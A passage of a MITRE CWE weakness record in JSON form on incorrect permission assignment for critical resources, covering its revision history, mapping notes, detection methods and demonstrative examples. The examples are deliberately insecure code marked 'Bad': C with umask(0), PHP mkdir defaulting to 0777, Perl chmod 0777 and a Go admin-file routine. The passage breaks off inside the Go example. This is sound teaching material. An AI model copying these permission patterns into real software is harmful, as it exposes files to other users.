"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Modes_of_Introduction, Observed_Examples, Potential_Mitigations, References",
"ModificationDate": "2009-12-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2010-02-16",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, Related_Attack_Patterns",
"ModificationDate": "2010-04-05",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Relationships",
"ModificationDate": "2010-06-21",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, Relationships",
"ModificationDate": "2010-09-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2010-12-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Description, Relationships",
"ModificationDate": "2011-03-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Relationships, Taxonomy_Mappings",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2011-06-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings",
"ModificationDate": "2011-09-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References",
"ModificationDate": "2013-07-17",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors, Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns, Relationships",
"ModificationDate": "2017-01-19",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings",
"ModificationDate": "2019-01-03",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2019-06-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Maintenance_Notes, Relationships",
"ModificationDate": "2019-09-19",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Description, Detection_Factors, Modes_of_Introduction, Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-12-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples, Relationships",
"ModificationDate": "2021-07-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Observed_Examples, References",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Description, References",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Description, Potential_Mitigations, References, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes, Relationships",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2009-01-12",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Insecure Permission Assignment for Resource",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2009-05-27",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Insecure Permission Assignment for Critical Resource",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed-with-Review
|
While the name itself indicates an assignment of permissions for resources, this is often misused for vulnerabilities in which "permissions" are not checked, which is an "authorization" weakness (CWE-285 or descendants) within CWE's model [REF-1287].
|
Closely analyze the specific mistake that is allowing the resource to be exposed, and perform a CWE mapping for that mistake.
|
[
"Frequent Misuse"
] | null |
[
{
"CweID": "285",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
},
{
"CweID": "668",
"Nature": "ChildOf",
"Ordinal": null,
"ViewID": "1000"
}
] | null |
[
{
"Description": "\n\nAutomated static analysis may be effective in detecting permission problems for system resources such as files, directories, shared memory, device interfaces, etc. Automated techniques may be able to detect the use of library functions that modify permissions, then analyze function calls for arguments that contain potentially insecure values.\n\n\nHowever, since the software's intended security policy might allow loose permissions for certain operations (such as publishing a file on a web server), automated static analysis may produce some false positives - i.e., warnings that do not have any security consequences or require any code changes.\n\n\nWhen custom permissions models are used - such as defining who can read messages in a particular forum in a bulletin board system - these can be difficult to detect using automated static analysis. It may be possible to define custom signatures that identify any custom functions that implement the permission checks and assignments.\n",
"DetectionMethodID": null,
"Effectiveness": null,
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
},
{
"Description": "\n\nAutomated dynamic analysis may be effective in detecting permission problems for system resources such as files, directories, shared memory, device interfaces, etc.\n\n\nHowever, since the software's intended security policy might allow loose permissions for certain operations (such as publishing a file on a web server), automated dynamic analysis may produce some false positives - i.e., warnings that do not have any security consequences or require any code changes.\n\n\nWhen custom permissions models are used - such as defining who can read messages in a particular forum in a bulletin board system - these can be difficult to detect using automated dynamic analysis. It may be possible to define custom signatures that identify any custom functions that implement the permission checks and assignments.\n",
"DetectionMethodID": null,
"Effectiveness": null,
"EffectivenessNotes": null,
"Method": "Automated Dynamic Analysis"
},
{
"Description": "This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.",
"DetectionMethodID": "DM-7",
"Effectiveness": null,
"EffectivenessNotes": "These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules.",
"Method": "Manual Analysis"
},
{
"Description": "Manual static analysis may be effective in detecting the use of custom permissions models and functions. The code could then be examined to identifying usage of the related functions. Then the human analyst could evaluate permission assignments in the context of the intended security model of the software.",
"DetectionMethodID": null,
"Effectiveness": null,
"EffectivenessNotes": null,
"Method": "Manual Static Analysis"
},
{
"Description": "Manual dynamic analysis may be effective in detecting the use of custom permissions models and functions. The program could then be executed with a focus on exercising code paths that are related to the custom permissions. Then the human analyst could evaluate permission assignments in the context of the intended security model of the software.",
"DetectionMethodID": null,
"Effectiveness": null,
"EffectivenessNotes": null,
"Method": "Manual Dynamic Analysis"
},
{
"Description": "Fuzzing is not effective in detecting this weakness.",
"DetectionMethodID": null,
"Effectiveness": null,
"EffectivenessNotes": null,
"Method": "Fuzzing"
},
{
"Description": "\n\nUse monitoring tools that examine the software's process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.\n\n\nAttach the monitor to the process and watch for library functions or system calls on OS resources such as files, directories, and shared memory. Examine the arguments to these calls to infer which permissions are being used.\n",
"DetectionMethodID": "DM-11.1",
"Effectiveness": null,
"EffectivenessNotes": "Note that this technique is only useful for permissions issues related to system resources. It is not likely to detect application-level business rules that are related to permissions, such as if a user of a blog system marks a post as \"private,\" but the blog system inadvertently marks it as \"public.\"",
"Method": "Black Box"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tInter-application Flow Analysis",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis - Binary or Bytecode"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tBinary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Manual Static Analysis - Binary or Bytecode"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tHost-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria\n\t\tWeb Application Scanner\n\t\tWeb Services Scanner\n\t\tDatabase Scanners",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Dynamic Analysis with Automated Results Interpretation"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tHighly cost effective:\n```\n\n\t\tHost Application Interface Scanner\n\t```\n\t\tCost effective for partial coverage:\n```\n\n\t\tFuzz Tester\n\t\tFramework-based Fuzzer\n\t\tAutomated Monitored Execution\n\t\tForced Path Execution",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Dynamic Analysis with Manual Results Interpretation"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tHighly cost effective:\n```\n\n\t\tManual Source Code Review (not inspections)\n\t```\n\t\tCost effective for partial coverage:\n```\n\n\t\tFocused Manual Spotcheck - Focused manual analysis of source",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Manual Static Analysis - Source Code"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tContext-configured Source Code Weakness Analyzer",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis - Source Code"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tConfiguration Checker",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tHighly cost effective:\n```\n\n\t\tFormal Methods / Correct-By-Construction\n\t```\n\t\tCost effective for partial coverage:\n```\n\n\t\tInspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Architecture or Design Review"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following code sets the umask of the process to 0 before creating a file and writing \"Hello world\" into the file.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t#define OUTFILE \"hello.out\"\n\tumask(0);\n\tFILE *out;\n```\n/* Ignore link following (CWE-59) for brevity */* \n\t\n\tout = fopen(OUTFILE, \"w\");\n\tif (out) {\n\t```\n\t\tfprintf(out, \"hello world!\\n\");\n\t\tfclose(out);\n\t}\n```",
"IntroText": null,
"Language": "C",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "After running this program on a UNIX system, running the \"ls -l\" command might return the following output:",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t-rw-rw-rw- 1 username 13 Nov 24 17:58 hello.out\n```",
"IntroText": null,
"Language": null,
"Nature": "Result",
"Reference": null
},
{
"BodyText": "The \"rw-rw-rw-\" string indicates that the owner, group, and world (all users) can read the file and write to it.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This code creates a home directory for a new user, and makes that user the owner of the directory. If the new directory cannot be owned by the user, the directory is deleted.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tfunction createUserDir($username){\n\t\t$path = '/home/'.$username;\n\t\tif(!mkdir($path)){\n\t\t\treturn false;\n\t\t}\n\t\tif(!chown($path,$username)){\n\t\t\trmdir($path);\n\t\t\treturn false;\n\t\t}\n\t\treturn true;\n\t}\n```",
"IntroText": null,
"Language": "PHP",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "Because the optional \"mode\" argument is omitted from the call to mkdir(), the directory is created with the default permissions 0777. Simply setting the new user as the owner of the directory does not explicitly change the permissions of the directory, leaving it with the default. This default allows any user to read and write to the directory, allowing an attack on the user's files. The code also fails to change the owner group of the directory, which may result in access by unexpected groups.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "This code may also be vulnerable to Path Traversal (CWE-22) attacks if an attacker supplies a non alphanumeric username.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following code snippet might be used as a monitor to periodically record whether a web site is alive. To ensure that the file can always be modified, the code uses chmod() to make the file world-writable.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t$fileName = \"secretFile.out\";\n\tif (-e $fileName) {\n\t\tchmod 0777, $fileName;\n\t}\n\tmy $outFH;\n\tif (! open($outFH, \">>$fileName\")) {\n\t\tExitError(\"Couldn't append to $fileName: $!\");\n\t}\n\tmy $dateString = FormatCurrentTime();\n\tmy $status = IsHostAlive(\"cwe.mitre.org\");\n\tprint $outFH \"$dateString cwe status: $status!\\n\";\n\tclose($outFH);\n```",
"IntroText": null,
"Language": "Perl",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "The first time the program runs, it might create a new file that inherits the permissions from its environment. A file listing might look like:",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t-rw-r--r-- 1 username 13 Nov 24 17:58 secretFile.out\n```",
"IntroText": null,
"Language": null,
"Nature": "Result",
"Reference": null
},
{
"BodyText": "This listing might occur when the user has a default umask of 022, which is a common setting. Depending on the nature of the file, the user might not have intended to make it readable by everyone on the system.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "The next time the program runs, however - and all subsequent executions - the chmod will set the file's permissions so that the owner, group, and world (all users) can read the file and write to it:",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t-rw-rw-rw- 1 username 13 Nov 24 17:58 secretFile.out\n```",
"IntroText": null,
"Language": null,
"Nature": "Result",
"Reference": null
},
{
"BodyText": "Perhaps the programmer tried to do this because a different process uses different permissions that might prevent the file from being updated.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This program creates and reads from an admin file to determine privilege information.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "If the admin file doesn't exist, the program will create one. In order to create the file, the program must have write privileges to write to the file. After the file is created, the permissions need to be changed to read only.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t const adminFile = \"/etc/admin-users\"\n\t func createAdminFileIfNotExists() error { \n\t\t file, err := os.Create(adminFile)\n\t\t if err != nil {\n\t\t\t return err \n\t\t }\n\t\t return nil\n\t }\n\t func changeModeOfAdminFile() error { \n\t\t fileMode := os.FileMode(0440)\n\t\t if err := os.Chmod(adminFile, fileMode); err != nil {\n\t\t\t return err \n\t\t }\n\t\t return nil\n\t }\n```",
"IntroText": null,
"Language": "Go",
"Nature": "Bad",
"Reference": null
},
{
